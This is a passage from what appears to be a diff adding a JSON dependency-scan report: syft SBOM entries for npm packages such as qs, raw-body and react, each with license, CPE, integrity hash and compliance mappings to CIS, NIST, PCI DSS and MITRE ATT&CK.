"GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cd93e60074e9daeb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: qs 6.14.2", + "title": "qs 6.14.2", + "description": "Package discovered: qs 6.14.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "baa7b01807110a4c", + "name": "qs", + "version": "6.14.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:qs_project:qs:6.14.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/qs@6.14.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/qs/-/qs-6.14.2.tgz", + "integrity": "sha512-V/yCWTTF7VJ9hIh18Ugr2zhJMP01MY7c5kh4J870L7imm6/DIzBsNLTXzMwUA3yZ5b/KBqLx8Kp3uRvd7xSe3Q==", + "dependencies": { + "side-channel": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4d4da368c4cb9e85", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: qs 6.15.1", + "title": "qs 6.15.1", + "description": "Package discovered: qs 6.15.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "994fc27bb4c175c9", + "name": "qs", + "version": "6.15.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/qs@6.15.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/qs/-/qs-6.15.1.tgz", + "integrity": "sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==", + "dependencies": { + "side-channel": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "53a30fbc709808bd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: queue 6.0.2", + "title": "queue 6.0.2", + "description": "Package discovered: queue 6.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3d2cabf593c9f69a", + "name": "queue", + "version": "6.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:queue:queue:6.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/queue@6.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/queue/-/queue-6.0.2.tgz", + "integrity": "sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA==", + "dependencies": { + "inherits": "~2.0.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ef5b9014e52d743a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: queue-microtask 1.2.3", + "title": "queue-microtask 1.2.3", + "description": "Package discovered: queue-microtask 1.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "254ae16d84fc4780", + "name": "queue-microtask", + "version": "1.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:queue-microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:queue-microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:queue_microtask:queue-microtask:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:queue_microtask:queue_microtask:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:queue:queue-microtask:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:queue:queue_microtask:1.2.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/queue-microtask@1.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", + "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "cbdbab233debac3e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: range-parser 1.2.1", + "title": "range-parser 1.2.1", + "description": "Package discovered: range-parser 1.2.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4bcca27d3d8ccfdd", + "name": "range-parser", + "version": "1.2.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:range-parser:range-parser:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:range-parser:range_parser:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:range_parser:range-parser:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:range_parser:range_parser:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:range:range-parser:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:range:range_parser:1.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/range-parser@1.2.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz", + "integrity": "sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7d9cd0e4ae47337e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: raw-body 2.5.3", + "title": "raw-body 2.5.3", + "description": "Package discovered: raw-body 2.5.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "62bf6c85ca605f5a", + "name": "raw-body", + "version": "2.5.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:raw-body:raw-body:2.5.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:raw-body:raw_body:2.5.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:raw_body:raw-body:2.5.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:raw_body:raw_body:2.5.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:raw:raw-body:2.5.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:raw:raw_body:2.5.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/raw-body@2.5.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/raw-body/-/raw-body-2.5.3.tgz", + "integrity": "sha512-s4VSOf6yN0rvbRZGxs8Om5CWj6seneMwK3oDb4lWDH0UPhWcxwOWw5+qk24bxq87szX1ydrwylIOp2uG1ojUpA==", + "dependencies": { + "bytes": "~3.1.2", + "http-errors": "~2.0.1", + "iconv-lite": "~0.4.24", + "unpipe": "~1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aa3b52d55574a475", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: react 18.3.1", + "title": "react 18.3.1", + "description": "Package discovered: react 18.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "405f6eb700866b5f", + "name": "react", + "version": "18.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:react:react:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/react@18.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/react/-/react-18.3.1.tgz", + "integrity": "sha512-wS+hAgJShR0KhEvPJArfuPVN1+Hz1t0Y6n5jLrGQbkb4urgPE/0Rve+1kMB1v/oWgHgm4WIcV+i7F2pTVj+2iQ==", + "dependencies": { + "loose-envify": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "36e9f0b5d3cd995c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: react-dom 18.3.1", + "title": "react-dom 18.3.1", + "description": "Package discovered: react-dom 18.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "98bcef2cdcc9941a", + "name": "react-dom", + "version": "18.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:react-dom:react-dom:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-dom:react_dom:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_dom:react-dom:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_dom:react_dom:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react-dom:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react:react_dom:18.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/react-dom@18.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-18.3.1.tgz", + "integrity": "sha512-5m4nQKp+rZRb09LNH59GM4BxTh9251/ylbKIbpe7TpGxfJ+9kv6BLkLBXIjjspbgbnIBNqlI23tRnTWT0snUIw==", + "dependencies": { + "loose-envify": "^1.1.0", + "scheduler": "^0.23.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "19cfc2419956329b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: react-is 16.13.1", + "title": "react-is 16.13.1", + "description": "Package discovered: react-is 16.13.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0db53ea4a0e10790", + "name": "react-is", + "version": "16.13.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:react-is:react-is:16.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react-is:react_is:16.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:react_is:react-is:16.13.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": 